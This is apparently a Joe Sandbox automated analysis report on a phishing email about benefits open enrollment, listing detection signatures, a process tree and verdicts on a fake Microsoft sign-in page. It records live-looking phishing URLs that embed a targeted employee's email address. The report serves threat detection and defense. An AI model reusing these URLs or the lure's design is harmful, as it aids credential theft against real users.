Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
44zg1cvu.msg

Overview

General Information

Sample name:44zg1cvu.msg
renamed because original name is a hash value
Original sample name:FW BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric Friday 28th of June 2024 m144zg1cvu.msg
Analysis ID:1466358
MD5:42b3b3e14a1c514a7647e2916c6f4cb5
SHA1:b4db942f9d4ab74ee0c488433f083d273fad0c86
SHA256:e66b870ef3fa0efb51d0912366587a5c2033a7b582088bac6e899c2cf366e897
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Snort IDS alert for network traffic
Yara detected HtmlPhish54
Performs DNS queries to domains with low reputation
Detected hidden input values containing email addresses (often used in phishing pages)
Found iframes
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 3964 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\44zg1cvu.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 5752 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "94A4268F-64A9-402B-9D26-050228D3257E" "68CA683E-662B-479C-A333-B79E6B1D0F4B" "3964" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\LLZ-950309.htm MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 7324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4616 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    2.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      2.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        0.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          2.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 36 entries

            Sigma Signatures

            Sigma detected: Office Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 3964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
            Sigma detected: Outlook Security Settings Updated - Registry
            Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 3964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

            Snort Signatures

            Timestamp:07/02/24-20:22:04.124310
            SID:2857090
            Source Port:443
            Destination Port:49720
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            AI detected phishing page
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyzLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious. The domain name is not associated with Microsoft, which is the brand identified in the image. The legitimate domain for Microsoft is 'microsoft.com'. The presence of a prominent login form asking for a password without a CAPTCHA and the use of a misleading domain name are strong indicators of phishing. Social engineering techniques are evident as the page mimics the legitimate Microsoft login page to deceive users into entering their credentials. DOM: 2.6.pages.csv
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyzLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string subdomain and the '.xyz' top-level domain, which is often used in phishing attacks. The webpage mimics Microsoft's login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a captcha further raises suspicion. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. Additionally, the link for 'Forgot my password' and 'Sign in with another account' could be used to mislead users into providing their credentials. DOM: 4.7.pages.csv
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyzLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string and unusual domain extension (.xyz), which is often used in phishing attacks. The page mimics a Microsoft login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a CAPTCHA increases the risk. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. The use of social engineering techniques is evident as the page attempts to trick the user into entering their password by displaying a message about an incorrect password. Based on these factors, the site is determined to be a phishing site. DOM: 4.11.pages.csv
            Yara detected HtmlPhish54
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: Yara matchFile source: 4.7.pages.csv, type: HTML
            Source: Yara matchFile source: 4.9.pages.csv, type: HTML
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: Yara matchFile source: 4.9.pages.csv, type: HTML
            Source: Yara matchFile source: 4.11.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 4.7.pages.csv, type: HTML
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 4.9.pages.csv, type: HTML
            Source: Yara matchFile source: 4.11.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 4.7.pages.csv, type: HTML
            Source: Yara matchFile source: 0.2.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 2.3.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.6.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 4.7.pages.csv, type: HTML
            Source: Yara matchFile source: 4.11.pages.csv, type: HTML
            Source: Yara matchFile source: 4.9.pages.csv, type: HTML
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: melodi@scott-electric.com
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: Number of links: 0
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: Number of links: 0
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.comHTTP Parser: Base64 decoded: a[href="http://www.salidzini.lv/"][style="display: block; width: 120px; height: 40px; overflow: hidden; position: relative;"]
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: Title: Sign in to your account does not match URL
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: Title: Microsoft Online Password Reset does not match URL
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: <input type="password" .../> found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.comHTTP Parser: No favicon
            Source: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspxHTTP Parser: No favicon
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="author".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="author".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="author".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="author".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="author".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/loginHTTP Parser: No <meta name="copyright".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="copyright".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="copyright".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="copyright".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="copyright".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="copyright".. found
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49712 version: TLS 1.2
